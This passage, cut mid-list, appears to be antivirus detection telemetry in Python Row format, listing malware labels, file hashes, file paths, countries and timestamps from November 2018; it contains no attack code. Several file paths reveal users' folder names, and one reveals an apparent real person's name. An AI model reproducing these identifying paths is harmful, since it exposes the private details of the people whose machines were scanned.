  Row(detection=Row(filename='privacy', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-10-20-004812/Macintosh HD/Applications/Mac Auto Fixer.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.guhch.#M0.#R0'), hash='e22ee5368f3d08e28aae4acd1dd0994f2ed34fdd0ab162ba8d6e175daf0d26b0', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T00:02:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='evernote.html', filepath='C:\\Program Files\\XMind ZEN\\resources\\app\\out\\evernote.html', filesize=116000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='e5bd209e306c1fa4d4eb3f53da719433139da78afe3085ddfcdb3cf669e4a695', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-04T17:06:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsq4027.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-04T16:35:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fdb3729133d54830731fbd03d568aac3a4973afda794feec3266bf450bd049e0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\FDB3729133D54830731FBD03D568AAC3A4973AFDA794FEEC3266BF450BD049E0', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fdb3729133d54830731fbd03d568aac3a4973afda794feec3266bf450bd049e0', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:15:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-221144-b4df79de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a2e2de0\\AVSCAN-20181101-221128-B20033AA\\AVSCAN-20181101-221144-B4DF79DE', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='f5e3e92f6562e56435f4a2bc50148cbd58c8d4ffbfb445dbdc2e998975d55abb', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:11:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gkbdrv.dll', filepath='C:\\Program Files\\ISMV5\\Binary\\Gkbdrv.dll', filesize=324000, name='W32/Ramnit.C.#M0.#R0'), hash='ff9e1c0fe64b8bb5b28809da4542db88ce9eb787ba02bde4f18e998b37c3802f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='3', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T13:41:02Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='directx.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\DirectX\\DirectX.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2581403\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/RR \\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\age-of-mythology_1463970214_83e48837.exe', parentsize=2386718, timestamp='2018-11-02T20:54:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:08:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-00-43-28.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T03:43:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:33:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-080035-3f859221', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4445c0e1\\AVSCAN-20181102-075759-2E42F5CA\\AVSCAN-20181102-080035-3F859221', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:00:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T14:37:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='703165.doc', filepath='703165.doc', filesize=192000, name='W97M/Agent.3972612.#M0.#R0'), hash='58427503d5873da5fec241a685299b2b8b4addcd8f48f19aa6771d98f7f11f94', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T03:11:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1c31a9cbfc6550f82bdcef0125262cb6d97bd4f40aef977f4d78dd54dc0d5101', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1C31A9CBFC6550F82BDCEF0125262CB6D97BD4F40AEF977F4D78DD54DC0D5101', filesize=1156000, name='PUA/SoftPulse.oant.#M1.#R1'), hash='1c31a9cbfc6550f82bdcef0125262cb6d97bd4f40aef977f4d78dd54dc0d5101', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:36:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:38:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Documents and Settings\\X\\Configuración local\\Temp\\tmp8350076\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:45:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-080014-3d228c29', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4445c0e1\\AVSCAN-20181102-075759-2E42F5CA\\AVSCAN-20181102-080014-3D228C29', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:00:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sept 12.exe', filepath='D:\\DOKUMENKU\\GABUNG NOM TABUNGAN\\2012\\TAB SEPT 12\\SEPT 12.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:26:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:23:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-182112-81f3048d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2a82e24d\\AVSCAN-20181102-181849-686C7A54\\AVSCAN-20181102-182112-81F3048D', filesize=960000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='5a436798dbe7503e99e0db771b57e5f33da119ee6b3f5ebe8d3f37aa3c8e7ec5', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:21:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cl-eye-driver-5.3.0.0341-emuline.exe', filepath='D:\\software comp\\CL-Eye-Driver-5.3.0.0341-Emuline.exe', filesize=5480000, name='W32/Sality.AT.#M1.#R1'), hash='51d9e52445907840ad999e0fc33e48a52c5da9f76d7faf501c1b32d02a49d05d', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-02T04:31:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='un7zip.exe', filepath='\\\\?\\D:\\Application Software\\Window Xp SP3\\part1\\OEM\\bin\\un7zip.exe', filesize=192000, name='HEUR/APC.#M1.#R1'), hash='519f379eba52b42b5db7eb470e3115bf9ab417233949f5de7918a8ec910111c4', metadata=Row(cmdline=None, country='ET', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:08:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4b0e361687687a18b1fdeda5252179d286aa0d1912a68061b02ee4dadf46042c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\4B0E361687687A18B1FDEDA5252179D286AA0D1912A68061B02EE4DADF46042C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='4b0e361687687a18b1fdeda5252179d286aa0d1912a68061b02ee4dadf46042c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:18:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:45:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2e80d4e09ab2848696981ce3c00dab126a8084864368c0e3c5c9ebe9755c3e3d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2E80D4E09AB2848696981CE3C00DAB126A8084864368C0E3C5C9EBE9755C3E3D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2e80d4e09ab2848696981ce3c00dab126a8084864368c0e3c5c9ebe9755c3e3d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:13:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105122-6b3d1b19', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7326301a\\AVSCAN-20181102-105104-68B18B27\\AVSCAN-20181102-105122-6B3D1B19', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:51:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='e:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T08:27:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ly4ezxm_ywu(1).html', filepath='K:\\DRIVE E\\RIYAN\\RIYAN`s\\SKRIPSI & TESIS\\WILAS\\Tanah\\Aspek dan Implikasi Hukum dalam Pendaftaran Tanah dan Penertiban Sertifikat Hak-Hak atas Tanah - hukumonline.com_files\\lY4eZXm_YWu(1).html', filesize=56000, name='W32/Chir.B.#M1.#R1'), hash='1d5d761e685142f38b514b6c503d1f1f009175527a23545a9ed92aefb778aa8f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:29:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='madinah.scr', filepath='\\\\?\\E:\\اسلاميات\\Madinah.scr', filesize=192000, name='HEUR/APC.#M1.#R1'), hash='4229289aecf55f144647efe81a70a4df5a507f670db0f548aa518bf46eedfe5f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:42:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:09:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='in_cdda.dll', filepath='C:\\Program Files (x86)\\Winamp\\Plugins\\in_cdda.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='1a1041c8595122105905c56fee9ca4f9648260e6b2e726bedc6b32b8bf9d4c91', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-02T15:25:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134254-89a61ca1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-133949-6B870B95\\AVSCAN-20181102-134254-89A61CA1', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:42:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-215453-0eae0523', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_49270d97\\AVSCAN-20181102-215416-0A2862AA\\AVSCAN-20181102-215453-0EAE0523', filesize=4856000, name='HEUR/AGEN.1033989.#M1.#R1'), hash='05da284eecf14e3b72ff9f84102b0370fd71cb0d93dbf3aea2d78801b4863c1d', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:55:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa4452.5567\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa4452.5567\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T08:07:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fvdxrjcm.exe', filepath='F:\\RECYCLER\\S-7-4-07-3262740328-8645573582-664574467-6068\\FvdXRJcM.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='07b87ade61aa3f13cba28a0c3adb65ae54116d76148b3fc9252519fea4a8d47d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T11:23:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:02:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2501368, timestamp='2018-11-02T19:50:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:43Z'), dt=datetime.date(2018, 11, 2)),
